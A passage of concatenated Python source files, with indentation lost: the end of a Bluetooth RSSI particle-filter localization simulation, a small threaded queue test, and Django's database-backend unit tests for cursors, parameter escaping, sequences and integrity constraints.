return float( TX_Power + (rssiAtOne - TX_Power) * ( (np.log10(dist+1)) / (np.log10(2) ) ) )
# N_eff : Effective weight number
def neff(weights):
return 1.0 / np.sum(np.square(weights))
def getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
#reaOfTheMap=int( (ymax-ymin)*(xmax-xmin) )
step_size=(1/( np.ceil(np.sqrt(numberOfReceivers*1000) ) ) )
while True:
initial_points = np.mgrid[0:1+step_size:step_size, 0:1+step_size:step_size].reshape(2,-1).T
receiverPositions = KMeans(n_clusters=numberOfReceivers, random_state=0,n_init=100).fit(initial_points).cluster_centers_
if receiverPositions is not None:
receiverPositions[:,0]=xmin+receiverPositions[:,0]*(xmax-xmin)
receiverPositions[:,1]=ymin+receiverPositions[:,1]*(ymax-ymin)
return receiverPositions
def getBlockPositionsToInstall(xdims,ydims,numberOfBlocks):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfBlocksCreated=0
blockPositionsToInstall=[]
while numberOfBlocksCreated!=numberOfBlocks:
blockCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
collisionExists=False
for receiverPosition in receiverPositions:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,receiverPosition,receiverWidth,receiverLength):
collisionExists=True
break
intersectionWithOtherBlocksExists=False
if not collisionExists: # if collision exists, do not make other checks
for blockPosition in blockPositionsToInstall:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,blockPosition,blockWidth,blockLength):
intersectionWithOtherBlocksExists=True
break
if not collisionExists and not intersectionWithOtherBlocksExists:
blockPositionsToInstall.append(blockCoord)
numberOfBlocksCreated+=1
#print numberOfBlocksCreated
return np.array(blockPositionsToInstall)
def getRoomPositionsToInstall(xdims,ydims,numberOfRooms,roomBoundary):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfRoomsCreated=0
roomPositionsToInstall=[]
while numberOfRoomsCreated!=numberOfRooms:
roomCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
receiverHollowRoomCollisionExists=False
for receiverPosition in receiverPositions:
if not checkFirstRectangleContainsSecondRectangle(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=-roomBoundary) and \
checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=roomBoundary):
receiverHollowRoomCollisionExists=True
break
intersectionWithBlocksExists=False
if not receiverHollowRoomCollisionExists:
for blockPosition in blockPositions:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,blockPosition,blockWidth,blockLength,boundaryForFirstRect=roomBoundary):
intersectionWithBlocksExists=True
break
intersectionWithOtherRoomsExists=False
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists:
for roomPosition in roomPositionsToInstall:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,roomPosition,roomWidth,roomLength,boundaryForFirstRect=roomBoundary,boundaryForSecondRect=roomBoundary):
intersectionWithOtherRoomsExists=True
break
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists and not intersectionWithOtherRoomsExists:
roomPositionsToInstall.append(roomCoord)
numberOfRoomsCreated+=1
#print numberOfRoomsCreated
return np.array(roomPositionsToInstall)
# main function
# strongSignalDistance -> to how many meters we accept this signal as strong. We use it for confidence ellipse calculations
# sensitivityOfResult -> how much sensitive we are about the final position of our object of interest
# maxSignalError -> signals are erronoues in real life, to simulate add noise upto this number
# minUsefulSignal -> min signal value we use for distance calculation
# minSignalValue -> min signal that we can still find, if a signal is lower than that(if receiver is far away), then this receiver(s) cannot catch this signal.
# movingLimit -> how many meters at a time our object moves at max
# movingTendency -> in what direction and meters our object tends to move
def animate_dummy_init():
pass
def animate(iterNo, macID, currPerson, NumberOfParticles, xdims=(0, 50), ydims=(0, 50), maxSignalError=20, movingLimit=2, pastCoeff=0, minUsefulSignal=-90,
minSignalValue=-100,numberOfReceivers=4, sensitivityOfResult=1.0, strongSignalDistance=5 , movingTendency=np.array([0,0]) ):
print "iterNo is: ", iterNo
currPerson.move_beacon_in_map(xdims,ydims,movingLimit,movingTendency,roomBoundary=roomWallWidth/2)
#currPerson.beacon_pos = predefinedPos[iterNo]
currPerson.calc_RSSIs_to_Receivers(minSignalValue,minUsefulSignal,maxSignalError )
currPerson.setBeaconDistances_fromRSSIs(minUsefulSignal)
global numberOfNotFounds
print iterNo
isProcessed=False
if all(dist is None for dist in currPerson.distToReceivers):
#print "all distances are None, no processing"
numberOfNotFounds+=1
pass
else:
currPerson.averaged_beacon_pos = currPerson.multiLateration(xdims,ydims,sensitivityOfResult)
# 1st STEP
currPerson.predict_BLE(no_of_noise_elements = NumberOfParticles, movingLimit=movingLimit, pastCoeff = pastCoeff, xdims=xdims, ydims=ydims,movingTendency=movingTendency )
# 2nd STEP
currPerson.update_weights()
# resample if too few effective particles
if neff(currPerson.weights) < NumberOfParticles/2.0:
tmp_particles=np.zeros((NumberOfParticles, 2))
tmp_weights = np.zeros(NumberOfParticles)
tmp_particles[:]=currPerson.particles[:]
tmp_weights[:]=currPerson.weights[:]
currPerson.resample_from_higher_weights(tmp_particles, tmp_weights)
if np.allclose(tmp_weights, 1.0/NumberOfParticles):
currPerson.weights[:]=tmp_weights[:]
currPerson.particles[:]=tmp_particles[:]
else:
#print "no resampling is made for iteration " + iterNo
pass
currPerson.calc_PDF(strongSignalDistance,pastCoeff)
currPerson.prev_covMatrix=currPerson.covMatrix
currPerson.x_pp[:] = currPerson.x_prev[:] # or np.copyto(x_pp,x_prev)
currPerson.x_prev[:] = currPerson.particles[:] # or np.copyto(x_prev,particles)
global OverallError
CurrAccuracy = np.linalg.norm(currPerson.mu-currPerson.beacon_pos)
OverallError += CurrAccuracy
# https://stackoverflow.com/questions/20126061/creating-a-confidence-ellipses-in-a-sccatterplot-using-matplotlib
particles_x,particles_y=np.hsplit(currPerson.particles,2)
if iterNo == totalIterNo-1:
with open(sys.argv[4]+"_avgError.txt","a+") as outFile:
if OverallError!=0:
outFile.write(str(OverallError/(totalIterNo-numberOfNotFounds) ) + "\n")
else:
outFile.write(str(OverallError) + "\n")
with open(sys.argv[4]+"_noSignalError.txt","a+") as outFile:
outFile.write(str(numberOfNotFounds) + "\n" )
####################################################################################################################################################################################
if __name__ == '__main__':
main()
|
testQueue.py
|
from context import *
import time
import random
def consumer(queue):
print 'Received queue'
for i in range(1000):
queue.push('Elem %d' % i)
def producer(queue):
print 'Received queue'
while(True):
time.sleep(random.randint(0,2))
print 'Found: %s' % queue.pop()
pass
def main():
print 'starting'
queue = SyncQueue()
tc = threading.Thread(target=consumer, args=(queue,))
tc.daemon = True
tc.start()
tp = threading.Thread(target=producer, args=(queue,))
tp.daemon = True
tp.start()
try:
while True:
# print 'still here'
tc.join(600)
tp.join(600)
if not tc.isAlive():
break
if not tp.isAlive():
break
except KeyboardInterrupt:
print "Ctrl-c pressed ..."
print "Closing connections"
sys.exit(1)
if __name__ == '__main__':
main()
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
from decimal import Decimal
import re
import threading
import unittest
import warnings
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (connection, connections, DEFAULT_DB_ALIAS,
DatabaseError, IntegrityError, reset_queries, transaction)
from django.db.backends import BaseDatabaseWrapper
from django.db.backends.signals import connection_created
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.utils import format_number, CursorWrapper
from django.db.models import Sum, Avg, Variance, StdDev
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (TestCase, TransactionTestCase, override_settings,
skipUnlessDBFeature, skipIfDBFeature)
from django.test.utils import str_prefix, IgnoreAllDeprecationWarningsMixin
from django.utils import six
from django.utils.six.moves import xrange
from . import models
class DummyBackendTest(TestCase):
def test_no_databases(self):
"""
Test that empty DATABASES setting default to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in xrange(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
statements = connection.creation.sql_create_model(models.Square,
style=no_style())
match = re.search('"id" ([^,]+),', statements[0][0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses("PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 90301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
try:
connection.ops.last_executed_query(cursor, '', ())
except Exception:
self.fail("'last_executed_query' should not raise an exception.")
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
Test that last_executed_query() returns an Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
#13648: '%s' escaping support for sqlite3
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
# response should be an non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TestCase):
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
#4896: Test cursor.executemany
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
#4765: executemany with params=[] does nothing
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
#10320: executemany accepts iterators
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
#6254: fetchone, fetchmany, fetchall return strings as unicode objects
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
reset_queries()
with connection.cursor() as cursor:
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
